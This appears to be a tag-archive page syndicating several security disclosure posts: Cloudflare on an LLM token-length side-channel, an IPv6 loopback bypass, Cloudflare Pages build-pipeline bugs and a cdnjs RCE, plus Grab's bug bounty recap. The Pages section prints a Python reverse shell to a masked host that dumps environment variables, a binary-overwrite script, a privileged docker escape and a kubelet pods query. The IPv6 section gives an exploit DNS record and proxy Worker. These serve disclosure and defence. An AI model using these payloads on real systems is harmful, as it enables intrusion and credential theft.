Tag Archives: bug bounty

Mitigating a token-length side-channel attack in our AI products

Post Syndicated from Celso Martinho original https://blog.cloudflare.com/ai-side-channel-attack-mitigated


Since the discovery of CRIME, BREACH, TIME, LUCKY-13, and similar attacks, length-based side-channel attacks have been considered practical. Even though packets were encrypted, attackers were able to infer information about the underlying plaintext by analyzing metadata like the packet length or timing information.

Cloudflare was recently contacted by a group of researchers at Ben Gurion University who wrote a paper titled “What Was Your Prompt? A Remote Keylogging Attack on AI Assistants” that describes “a novel side-channel that can be used to read encrypted responses from AI Assistants over the web”.
The Workers AI and AI Gateway team collaborated closely with these security researchers through our Public Bug Bounty program, discovering and fully patching a vulnerability that affects LLM providers. You can read the detailed research paper here.

Since being notified about this vulnerability, we’ve implemented a mitigation to help secure all Workers AI and AI Gateway customers. As far as we could assess, there was no outstanding risk to Workers AI and AI Gateway customers.

How does the side-channel attack work?

In the paper, the authors describe a method in which they intercept the stream of a chat session with an LLM provider, use the network packet headers to infer the length of each token, extract and segment their sequence, and then use their own dedicated LLMs to infer the response.

The two main requirements for a successful attack are an AI chat client running in streaming mode and a malicious actor capable of capturing network traffic between the client and the AI chat service. In streaming mode, the LLM tokens are emitted sequentially, introducing a token-length side-channel. Malicious actors could eavesdrop on packets via public networks or within an ISP.

An example request vulnerable to the side-channel attack looks like this:

curl -X POST \
https://api.cloudflare.com/client/v4/accounts/<account-id>/ai/run/@cf/meta/llama-2-7b-chat-int8 \
  -H "Authorization: Bearer <Token>" \
  -d '{"stream":true,"prompt":"tell me something about portugal"}'

Let’s use Wireshark to inspect the network packets on the LLM chat session while streaming:

The first packet has a length of 95 and corresponds to the token “Port”, which has a length of four. The second packet has a length of 93 and corresponds to the token “ug”, which has a length of two, and so on. By removing the likely token envelope from the network packet length, it is easy to infer how many tokens were transmitted, as well as their sequence and individual lengths, just by sniffing encrypted network data.
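To make the arithmetic concrete, here is a minimal Python sketch of that inference step. The fixed envelope size of 91 bytes is simply derived from the example above (95 - 4 and 93 - 2), and the remaining packet sizes are made up for illustration.

# Packet sizes observed on the wire for a streamed response; the first two
# values come from the example above, the rest are made up for illustration.
observed_packet_lengths = [95, 93, 94, 99, 93]

# Assumed fixed per-token envelope (TLS record overhead plus JSON/SSE framing).
# An attacker would estimate this from known token/packet pairs: 95 - 4 = 91.
ENVELOPE_SIZE = 91

def infer_token_lengths(packet_lengths, envelope_size):
    """Recover the plaintext token-length sequence from encrypted packet sizes."""
    return [length - envelope_size for length in packet_lengths]

print(infer_token_lengths(observed_packet_lengths, ENVELOPE_SIZE))
# [4, 2, 3, 8, 2]: the token-length sequence fed to the attacker's inference LLMs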

Since the attacker needs the sequence of individual token lengths, this vulnerability only affects text generation models using streaming. This means that AI inference providers that use streaming (the most common way of interacting with LLMs), like Workers AI, are potentially vulnerable.

This method requires that the attacker is on the same network, or otherwise in a position to observe the communication traffic between the client and the AI service, and its accuracy depends on knowing the target LLM’s writing style. In ideal conditions, the researchers claim that their system “can reconstruct 29% of an AI assistant’s responses and successfully infer the topic from 55% of them”. It’s also important to note that, unlike other side-channel attacks, in this case the attacker has no way of evaluating its prediction against the ground truth. That means we are as likely to get a sentence with near-perfect accuracy as we are to get one where only the conjunctions match.

Mitigating LLM side-channel attacks

Since this type of attack relies on the length of tokens being inferred from the packets, it can be mitigated just as easily by obscuring token size. The researchers suggested a few strategies to mitigate these side-channel attacks, the simplest of which is padding the token responses with random-length noise to obscure the length of each token, so that responses cannot be inferred from the packets. While we immediately added the mitigation to our own inference product, Workers AI, we also wanted to help customers secure their LLMs regardless of where they run them by adding it to our AI Gateway.

As of today, all users of Workers AI and AI Gateway are now automatically protected from this side-channel attack.

What we did

Once we got word of this research work and how exploiting the technique could potentially impact our AI products, we did what we always do in situations like this: we assembled a team of systems engineers, security engineers, and product managers and started discussing risk mitigation strategies and next steps. We also had a call with the researchers, who kindly attended, presented their conclusions, and answered questions from our teams.

Unfortunately, at this point, the research does not include actual code that we can use to reproduce the claims or verify the effectiveness and accuracy of the described side-channel attack. However, we think that the paper has theoretical merit, that it provides enough detail and explanation, and that the risks are not negligible.

We decided to incorporate the first mitigation suggestion in the paper: including random padding to each message to hide the actual length of tokens in the stream, thereby complicating attempts to infer information based solely on network packet size.

Workers AI, our inference product, is now protected

With our inference-as-a-service product, anyone can use the Workers AI platform and make API calls to our supported AI models. This means that we oversee the inference requests being made to and from the models. As such, we have a responsibility to ensure that the service is secure and protected from potential vulnerabilities. We immediately rolled out a fix once we were notified of the research, and all Workers AI customers are now automatically protected from this side-channel attack. We have not seen any malicious attacks exploiting this vulnerability, other than the ethical testing from the researchers.

Our solution for Workers AI is a variation of the mitigation strategy suggested in the research paper. Since we stream JSON objects rather than the raw tokens, instead of padding the tokens with whitespace characters we added a new property, “p” (for padding), that has a string value of random, variable length.

Example streaming response using the SSE syntax:

data: {"response":"portugal","p":"abcdefghijklmnopqrstuvwxyz0123456789a"}
data: {"response":" is","p":"abcdefghij"}
data: {"response":" a","p":"abcdefghijklmnopqrstuvwxyz012"}
data: {"response":" southern","p":"ab"}
data: {"response":" European","p":"abcdefgh"}
data: {"response":" country","p":"abcdefghijklmno"}
data: {"response":" located","p":"abcdefghijklmnopqrstuvwxyz012345678"}

This has the advantage that no modifications are required to the SDK or the client code, the changes are invisible to end users, and no action is required from our customers. By adding a random-length value to each JSON object, we introduce variability at the network level, and the attacker essentially loses the required input signal. Customers can continue using Workers AI as usual while benefiting from this protection.
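For illustration only, here is a minimal Python sketch of how a server could attach this kind of random-length padding to each streamed event. The “p” field name matches the example above, but the padding alphabet and length range are assumptions rather than the exact values Workers AI uses.

import json
import random
import string

def pad_event(token: str, max_padding: int = 40) -> str:
    """Wrap a token in an SSE data line with a random-length "p" field."""
    padding = "".join(
        random.choices(string.ascii_lowercase + string.digits,
                       k=random.randint(1, max_padding))
    )
    return f'data: {json.dumps({"response": token, "p": padding})}\n\n'

for token in ["portugal", " is", " a", " southern", " European", " country"]:
    print(pad_event(token), end="")

Because the padding length is independent of the token length, the size of each packet no longer reveals the size of the token it carries.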

One step further: AI Gateway protects users of any inference provider

We added protection to our AI inference product, but we also have a product that proxies requests to any provider — AI Gateway. AI Gateway acts as a proxy between a user and supported inference providers, helping developers gain control, performance, and observability over their AI applications. In line with our mission to help build a better Internet, we wanted to quickly roll out a fix that can help all our customers using text generation AIs, regardless of which provider they use or if they have mitigations to prevent this attack. To do this, we implemented a similar solution that pads all streaming responses proxied through AI Gateway with random noise of variable length.

Our AI Gateway customers are now automatically protected against this side-channel attack, even if the upstream inference providers have not yet mitigated the vulnerability. If you are unsure if your inference provider has patched this vulnerability yet, use AI Gateway to proxy your requests and ensure that you are protected.

Conclusion

At Cloudflare, our mission is to help build a better Internet – that means that we care about all citizens of the Internet, regardless of what their tech stack looks like. We are proud to be able to improve the security of our AI products in a way that is transparent and requires no action from our customers.

We are grateful to the researchers who discovered this vulnerability and have been very collaborative in helping us understand the problem space. If you are a security researcher who is interested in helping us make our products more secure, check out our Bug Bounty program at hackerone.com/cloudflare.

Championing CyberSecurity: Grab’s bug bounty programme in 2023

Post Syndicated from Grab Tech original https://engineering.grab.com/cybersec-bug

Launched in 2015, Grab’s security bug bounty programme has achieved remarkable success and forged strong partnerships within a thriving bounty community. By holding quarterly campaigns with HackerOne, Grab has demonstrated its dedication to security and to giving back to the global security community to support further research. Over the years, Grab has paid out over $700,000 cumulatively to committed security researchers, aiding their research.

Our journey doesn’t stop there – we’ve also expanded our internal bug bounty team, ensuring that we have the necessary resources to stay at the forefront of security challenges. As we continue to innovate and evolve, it’s critical that our team remains at the cutting edge of security developments.

Marking its eighth year in 2023, this initiative has achieved new milestones and continues to set the stage for an even more successful ninth year. In 2023, this included a special campaign at Threatcon Nepal, aimed at increasing our bounty engagements. A key development was the enrichment of monetary incentives to honour our hacker community’s remarkable contributions to our programme’s success.

Let’s look at the key takeaways we gained from the bug bounty programme in 2023.

Highlights from 2023

This year, we had some of the highest participation and engagement rates we’ve seen since the programme launched.

  • We’ve processed ~1000 submissions through our HackerOne bug bounty programme.
  • Impressive record of 400 submissions in the Q1 2023 campaign.
  • We’ve maintained a consistent schedule of campaigns and innovative efforts to enhance hacker engagement.
  • Released a comprehensive report of our seven-year bug bounty journey – check out some key highlights in the image below.

What’s next?

As Grab expands and transforms its product and service portfolio, we are dedicated to ensuring that our bug bounty programme reflects this growth. In our rigorous pursuit of boosting security, we regularly introduce new areas of focus to our scope. In 2024, expect the inclusion of new scopes, enhanced response times, heightened engagement from the hacker community, and more competitive rewards.

In the past year, we have incorporated Joint Ventures and Acquisitions into the scope of our bug bounty programme. By doing so, we proactively address emerging security challenges, while fortifying the safety and integrity of our expanding ecosystem. We remain fully dedicated to embracing change and growth as integral parts of our journey to provide a secure and seamless experience for our users.

On top of that, we continue to improve our methods of motivating researchers through the bug bounty programme. One recent change is to diversify our reward methods by incorporating both financial rewards and recognition. This allows us to cater to different researcher motivations, cultivate stronger relationships, and acknowledge researchers’ contributions.

That said, we recognise that there’s always room for improvement and the bug bounty programme is uniquely poised for substantial expansion. In the near future, we will be:

  • Introducing more elements to the scope of our bug bounty programme
  • Enhancing feedback loops on the HackerOne platform

With these improvements, we can drive continuous improvement efforts to provide a secure experience for our users while strengthening our connection with the security research community.

A word of thanks

2023 has been an exhilarating year for our team. We’re grateful for the continued support from all the security researchers who’ve actively participated in our programme.

Here are the top three researchers in 2023:

  1. Damian89 
  2. Happy_csr 
  3. mclaren650sspider 

As we head into our ninth year, we know there are new opportunities and challenges that await us. We strive to remain dedicated to the values of collaboration and continuous improvement, working hand in hand with the security community to enhance our superapp’s security and deliver an even safer experience for our users.

We’re gearing up for another exciting year ahead in our programme, and looking forward to interesting submissions from our participants. We extend an open invitation to all researchers to submit reports to our bug bounty programme. Your contributions hold immense value and have a significant impact on the safety and security of our products, our users, and the broader security community. For comprehensive information about the programme scope, rules, and rewards, visit our website.

Until next year, keep up the great work, and happy hacking!

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Cloudflare’s handling of a bug in interpreting IPv4-mapped IPv6 addresses

Post Syndicated from Lucas Ferreira original https://blog.cloudflare.com/cloudflare-handling-bug-interpreting-ipv4-mapped-ipv6-addresses/

In November 2022, our bug bounty program received a critical and very interesting report. The report stated that certain types of DNS records could be used to bypass some of our network policies and connect to ports on the loopback address (e.g. 127.0.0.1) of our servers. This post will explain how we dealt with the report, how we fixed the bug, and the outcome of our internal investigation to see if the vulnerability had been previously exploited.

RFC 4291 defines ways to embed an IPv4 address into IPv6 addresses. One of the methods defined in the RFC is to use IPv4-mapped IPv6 addresses, that have the following format:

   |                80 bits               | 16 |      32 bits        |
   +--------------------------------------+--------------------------+
   |0000..............................0000|FFFF|    IPv4 address     |
   +--------------------------------------+----+---------------------+

In IPv6 notation, the corresponding mapping for 127.0.0.1 is ::ffff:127.0.0.1 (RFC 4038).
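As a quick illustration (using Python’s standard ipaddress module, not code from any affected system), the mapping is easy to see:

import ipaddress

addr = ipaddress.ip_address("::ffff:127.0.0.1")
print(type(addr).__name__)  # IPv6Address: the value parses as an IPv6 address...
print(addr.ipv4_mapped)     # 127.0.0.1: ...but it embeds the IPv4 loopback address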

The researcher was able to use DNS entries based on mapped addresses to bypass some of our controls and access ports on the loopback address or non-routable IPs.

This vulnerability was reported on November 27 to our bug bounty program. Our Security Incident Response Team (SIRT) was contacted, and incident response activities began shortly after the report was filed. A hotpatch was deployed three hours later to prevent exploitation of the bug.

Date              Time (UTC)  Activity
27 November 2022  20:42       Initial report to Cloudflare’s bug bounty program
                  21:04       SIRT on-call is paged
                  21:15       SIRT manager on call starts working on the report
                  21:22       Incident declared; team is assembled and debugging starts
                  23:20       A hotfix is ready and deployment starts
                  23:47       Team confirms that the hotfix is deployed and working
                  23:58       Team investigates whether other products are affected. Load Balancers and Spectrum are potential targets; both are found to be unaffected by the vulnerability.
28 November 2022  21:14       A permanent fix is ready
29 November 2022  21:34       Permanent fix is merged

Blocking exploitation

Immediately after the vulnerability was reported to our Bug Bounty program, the team began working to understand the issue and find ways to quickly block potential exploitation. It was determined that the fastest way to prevent exploitation would be to block the creation of the DNS records required to execute the attack.

The team then began to implement a patch to prevent the creation of DNS records that include IPv6 addresses that map to loopback or RFC 1918 (internal) IPv4 addresses. The fix was fully deployed and confirmed three hours after the report was filed. We later realized that this change was insufficient, because records hosted on external DNS servers could also be used in this attack.

The exploit

The exploit provided consisted of two parts: a DNS entry and a Cloudflare Worker. The DNS entry was an AAAA record pointing to ::ffff:127.0.0.1:

exploit.example.com AAAA ::ffff:127.0.0.1

The worker included the following code:

export default {
    async fetch(request) {
        const requestJson = await request.json()
        return fetch(requestJson.url, requestJson)
    }
}

The Worker was given a custom URL such as proxy.example.com.

With that setup, it was possible to make the worker attempt connections on the loopback interface of the server where it was running. The call would look like this:

curl https://proxy.example.com/json -d '{"url":"http://exploit.example.com:80/url_path"}'

The attack could then be scripted to attempt to connect to multiple ports on the server.
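For illustration, such a script might look like the Python sketch below. It reuses the placeholder hostnames proxy.example.com and exploit.example.com from the example above, and the port list is arbitrary.

import json
import urllib.request

PROXY = "https://proxy.example.com/json"  # the Worker route from the example

for port in (22, 80, 443, 3000, 6379, 8080):
    payload = json.dumps({"url": f"http://exploit.example.com:{port}/"}).encode()
    request = urllib.request.Request(
        PROXY, data=payload, headers={"Content-Type": "application/json"}
    )
    try:
        with urllib.request.urlopen(request, timeout=5) as response:
            # Any HTTP answer suggests a service is listening on that port.
            print(port, "->", response.status)
    except Exception as error:
        print(port, "-> no response:", error)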

It was also found that a similar setup could be used with other IPv4 addresses to attempt connections into internal services. In this case, the DNS entry would look like:

exploit.example.com AAAA ::ffff:10.0.0.1

This exploit would allow an attacker to connect to services running on the loopback interface of the server. If the attacker was able to bypass the security and authentication mechanisms of a service, it could impact the confidentiality and integrity of data. For services running on other servers, the attacker could also use the Worker to attempt connections and map the services available over the network. As in most networks, Cloudflare’s network policies and ACLs must leave a few ports accessible, and those ports would have been reachable by an attacker using this exploit.

Investigation

We started an investigation to understand the root cause of the problem and created a proof-of-concept that allowed the team to debug the issue. At the same time, we started a parallel investigation to determine if the issue had been previously exploited.

It all happened when two bugs collided.

The first bug was in our internal DNS system, which is responsible for mapping hostnames to the IP addresses of our customers’ origin servers (the DNS system). When the DNS system tried to answer a query for the DNS record for exploit.example.com, it serialized the IP as a string. The Golang net library used for DNS automatically converted the IP ::ffff:10.0.0.1 to the string “10.0.0.1”. However, the DNS system still treated it as an IPv6 address, so a query response of {ipv6: “10.0.0.1”} was returned.

The second bug was in our internal HTTP system (the proxy), which is responsible for forwarding HTTP traffic to customers’ origin servers. The bug was in how the proxy validated this DNS response, {ipv6: “10.0.0.1”}. The proxy has two deny lists of IPs that are not allowed to be used as origins, one for IPv4 and one for IPv6; these lists contain localhost IPs and private IPs. The bug was that the proxy compared the address 10.0.0.1 against the IPv6 deny list because the address appeared in the “ipv6” section of the response. Naturally, the address didn’t match any entry in that deny list, so it was allowed to be used as an origin IP address.

The second investigation team searched through the logs and found no evidence of previous exploitation of this vulnerability. The team also checked Cloudflare DNS for entries using IPv4-mapped IPv6 addresses and determined that all the existing entries had been used for testing purposes. As of now, there are no signs that this vulnerability could have been previously used against Cloudflare systems.

Remediating the vulnerability

To address this issue, we fixed the proxy service to validate the IP address against the deny list that matches the parsed address itself, not the deny list for the IP family that the DNS API response claimed it to be. We confirmed in both our test and production environments that the fix prevents the issue from happening again.
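The sketch below illustrates the corrected logic in Python. It is not Cloudflare’s proxy code, and the deny lists are illustrative, but it captures the key idea: unwrap IPv4-mapped addresses and check the deny list that matches the parsed address, not the family label in the DNS response.

import ipaddress

# Illustrative deny lists; the real lists cover additional ranges.
DENY_V4 = [ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("10.0.0.0/8")]
DENY_V6 = [ipaddress.ip_network("::1/128"), ipaddress.ip_network("fc00::/7")]

def origin_is_allowed(origin: str) -> bool:
    addr = ipaddress.ip_address(origin)
    # Unwrap IPv4-mapped IPv6 addresses so they are validated as IPv4.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    deny_list = DENY_V4 if addr.version == 4 else DENY_V6
    return not any(addr in network for network in deny_list)

print(origin_is_allowed("::ffff:10.0.0.1"))  # False: caught after unwrapping
print(origin_is_allowed("203.0.113.7"))      # True: a routable documentation address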

Beyond maintaining a bug bounty program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our bug bounty program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. We invite those that find a security issue in any of Cloudflare’s services to report it to us through HackerOne.

The Cloudflare Bug Bounty program and Cloudflare Pages

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and fully patched the vulnerabilities they discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and we also highlight the bug bounty program that helps make our products more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

  1. We investigate the issue to understand the criticality of the report.
  2. We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems, we start working with engineering immediately; less urgent issues we track and prioritize alongside engineering’s normal bug-fixing cadences.
  3. Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited; we must conclusively prove that it was not exploited. For almost all of the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively with activity by trusted security researchers.

However, for one bug, while we found no evidence that it was exploited beyond the work of the security researchers, we were not able to meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

A flaw in our logic during build initialization made it possible to execute arbitrary code, echo environment variables to a file, and then read the contents of that file.

The crux of the bug was that the root_dir value passed during build initialization was attacker controlled. The researcher was able to craft a malicious root_dir that dumped the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key, which would have allowed the attacker to read the repositories of other Pages customers, many of which are private.

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by anyone else (potentially malicious). Our logs showed that this was the first time this particular attack had been performed, and that it was responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but in the publishing step instead of the clone step. We went to work fixing the input validation issues and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and only within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer Pages sites, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had Linux permissions of 777, allowing all users on the machine to read the program, execute it, and, most importantly, overwrite it. If an attacker can overwrite the program prior to its invocation, the program may run with higher permissions when the next user comes along and invokes it.

In this case the attack is simple. When a Pages build runs, the attacker specifies the following build.sh to run, and it overwrites the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attacker only needs to run `env` to see the list of environment variables that the program was invoked with. We fixed the file permissions on the binary, rotated the credentials, and checked the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and only within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately, not all of these directories had the proper filesystem permissions, allowing a malicious version of the bash program to be written into one of them and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and checked the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and only within the scope of the security research.
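A quick audit for this class of misconfiguration can be scripted. The sketch below is an illustration, not the tooling Cloudflare used; it flags PATH entries that are world-writable and could therefore be used to plant a malicious bash binary.

import os
import stat

def world_writable_path_entries(path_value: str):
    """Return PATH directories that any local user could write into."""
    risky = []
    for directory in path_value.split(":"):
        try:
            mode = os.stat(directory).st_mode
        except FileNotFoundError:
            continue  # listed in PATH but not present on this machine
        if mode & stat.S_IWOTH:
            risky.append(directory)
    return risky

print(world_writable_path_entries(os.environ.get("PATH", "")))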

Bug 5: Azure pipelines escape

Back when this research was conducted, we were running Cloudflare Pages on Azure Pipelines. Builds took place in highly privileged containers that had the Docker socket available to them. Once the researchers had root within these containers, escaping them was trivial: install Docker and mount the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host, which gave access to the Azure organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receiving the above bugs, we decided to change the architecture of Pages. One of these changes was migrating the product from Azure to Kubernetes and simplifying the workflow, so that the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds run within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k http://10.124.200.1:10255/pods

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and for the incredible depth at which it was done. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research and to work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Cloudflare’s Handling of an RCE Vulnerability in cdnjs

Post Syndicated from Jonathan Ganz original https://blog.cloudflare.com/cloudflares-handling-of-an-rce-vulnerability-in-cdnjs/

cdnjs provides JavaScript, CSS, image, and font assets for websites to reference, with more than 4,000 libraries available. By utilizing cdnjs, websites can load faster with less strain on one’s own origin server, as files are served directly from Cloudflare’s edge. Recently, a blog post detailed a vulnerability in the way cdnjs’ backend automatically keeps the libraries up to date.

This vulnerability allowed the researcher to execute arbitrary code, granting the ability to modify assets. This blog post details how Cloudflare responded to this report, including the steps we took to block exploitation, investigate potential abuse, and remediate the vulnerability.

This vulnerability is not related to Cloudflare CDN. The cdnjs project is a platform that leverages Cloudflare’s services, but the vulnerability described below relates to cdnjs’ platform only. To be clear, no existing libraries were modified using this exploit. The researcher published a new package which demonstrated the vulnerability and our investigation concluded that the integrity of all assets hosted on cdnjs remained intact.

Disclosure Timeline

As outlined in RyotaK’s blog post, the incident began on 2021-04-06. At around 1100 GMT, RyotaK published a package to npm exploiting the vulnerability. At 1129 GMT, cdnjs processed this package, resulting in a leak of credentials. This triggered GitHub alerting which notified Cloudflare of the exposed secrets.

Cloudflare disabled the auto-update service and revoked all credentials within an hour. In the meantime, our security team received RyotaK’s remote code execution report through HackerOne. A new version of the auto-update tool which prevents exploitation of the vulnerability RyotaK reported was released within 24 hours.

Having taken action immediately to prevent exploitation, we then proceeded to redesign the auto-update pipeline. Work to completely redesign it was completed on 2021-06-03.

Blocking Exploitation

Before RyotaK reported the vulnerability via HackerOne, Cloudflare had already taken action. When GitHub notified us that credentials were leaked, one of our engineers took immediate action and revoked them all. Additionally, the GitHub token associated with this service was automatically revoked by GitHub.

The second step was to bring the vulnerable service offline to prevent further abuse while we investigated the incident. This prevented exploitation but also made it impossible for legitimate developers to publish updates to their libraries. We wanted to release a fixed version of the pipeline used for retrieving and hosting new library versions so that developers could continue to benefit from caching. However, we understood that a stopgap was not a long term fix, and we decided to review the entire current solution to identify a better design that would improve the overall security of cdnjs.

Investigation

Any sort of investigation requires access to logs and all components of our pipeline generate extensive logs that prove valuable for forensics efforts. Logs produced by the auto-update process are collected in a GitHub repository and sent to our logging pipeline. We also collect and retain logs from cdnjs’ Cloudflare account. Our security team began reviewing this information as soon as we received RyotaK’s initial report. Based on access logs, API token usage, and file modification metadata, we are confident that only RyotaK exploited this vulnerability during his research and only on test files. To rule out abuse, we reviewed the list of source IP addresses that accessed the Workers KV token prior to revoking it and only found one, which belongs to the cdnjs auto-update bot.

The cdnjs team also reviewed files that were pushed to the cdnjs/cdnjs GitHub repository around that time and found no evidence of any other abuse across cdnjs.

Remediating the Vulnerability

Around half of the libraries on cdnjs use npm to auto-update. The primary vector in this attack was the ability to craft a .tar.gz archive containing a symbolic link and publish it to the npm registry. When our pipeline extracted the contents, it would follow symlinks and overwrite local files with the pipeline user’s privileges. There are two fundamental issues at play here: an attacker can perform path traversal on the host processing untrusted files, and the process handling the compressed file is overly privileged.

We addressed the path traversal issue by checking that the destination of each file in the tarball falls within the target directory that the update process has designated for that package. If a file’s full canonical path doesn’t begin with the destination directory’s full path, we log a warning and skip extracting that file. This works fairly well, but, as noted in a comment accompanying this check, if the compressed file uses UTF-8 encoding for filenames, the check may not properly canonicalize the path. If that canonicalization does not occur, the path may still contain a traversal even though it starts with the correct destination path.
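A containment check of that kind might look like the following Python sketch. It is a simplified illustration of the approach rather than the actual pipeline code: each member’s destination is resolved to a canonical path, and anything that is a link or escapes the target directory is skipped with a warning.

import os
import tarfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a tarball, skipping members that would land outside dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    with tarfile.open(archive_path, "r:gz") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_root, member.name))
            # Refuse links and any path whose canonical form escapes dest_root.
            if member.issym() or member.islnk() or \
                    os.path.commonpath([dest_root, target]) != dest_root:
                print(f"warning: skipping suspicious member {member.name}")
                continue
            tar.extract(member, dest_root)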

To ensure that other vulnerabilities in cdnjs’ publication pipeline cannot be exploited, we configured an AppArmor profile for it. This limits the capabilities of the service: even if an attacker successfully instructs the process to perform an action, the operating system kernel will not allow anything outside of what the profile permits.

For illustration, here’s an example:

/path/to/bin {
  network,
  signal,
  /path/to/child ix,
  /tmp/ r,
  /tmp/cache** rw,
  ...
}

In this example, we only allow the binary (/path/to/bin) to:

  • access all networking
  • use all signals
  • execute /path/to/child (which will inherit the AppArmor profile)
  • read from /tmp
  • read+write under /tmp/cache.

Any attempt to access anything else will be denied. You can find the complete list of capabilities and more information on AppArmor’s manual page.

In the case of cdnjs’ autoupdate tool, we limit execution of applications to a very specific set, and we limit where files can be written.

Fixing the path traversal and implementing the AppArmor profile prevent similar issues from being exploited. However, having a single layer of defense wasn’t enough. We decided to completely redesign the auto-update process to isolate each step, as well as each library it processes, thus preventing this entire class of attacks.

Redesigning the system

